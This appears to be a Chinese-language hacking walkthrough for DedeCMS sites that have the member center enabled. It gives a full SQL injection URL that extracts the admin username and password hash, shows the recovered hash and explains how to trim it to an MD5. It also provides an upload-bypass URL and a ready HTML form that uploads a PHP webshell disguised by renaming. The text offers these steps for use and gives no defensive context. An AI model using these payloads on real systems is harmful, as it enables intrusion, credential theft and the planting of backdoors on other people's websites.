此方法的目標dedecms必須開啟會員中心

微信截圖_20190815142636.png

(系統關閉了會員功能,因此你無法訪問此頁面!)

爆路徑:data/mysql_error_trace.inc

①注入漏洞
這站 http://www.xxxxxxxx.com/
首先訪問“/data/admin/ver.txt”頁面獲取系統最后升級時間,
然后訪問“/member/ajax_membergroup.php?action=post&membergroup=1”頁面,如圖說明存在該漏洞。
然后寫上語句
查看管理員帳號

http://www.xxxxxxxx.com/member/ajax_membergroup.php?action=post&[email protected]`'`%20Union%20select%20userid%20from%20`%[email protected]__admin`%20where%201%20or%[email protected]`'`

admin

查看管理員密碼

http://www.xxxxxxxx.com/member/ajax_membergroup.php?action=post&[email protected]`'`%20Union%20select%20pwd%20from%20`%[email protected]__admin`%20where%201%20or%[email protected]

8d29b1ef9f8c5a5af429

查看管理員密碼

得到的是19位的,去掉前三位和最后一位,得到管理員的16位MD5

8d2
9b1ef9f8c5a5af42
9

cmd5沒解出來 只好測試第二個方法

②上傳漏洞

只要登陸會員中心,然后訪問頁面鏈接

http://www.xxxx.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs=../dialog/select_soft_post

如圖,說明通過“/plus/carbuyaction.php”已經成功調用了上傳頁面“/dialog/select_soft_post”

于是將php一句話木馬擴展名改為“rar”等,利用提交頁面upload1.htm

<form action="http://www.xxxx.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1">
file:<input name="uploadfile" type="file" /><br>
newname:<input name="newname" type="text" value="simple.Php"/>
<button class="button2" type="submit">提交</button><br><br

即可上傳成功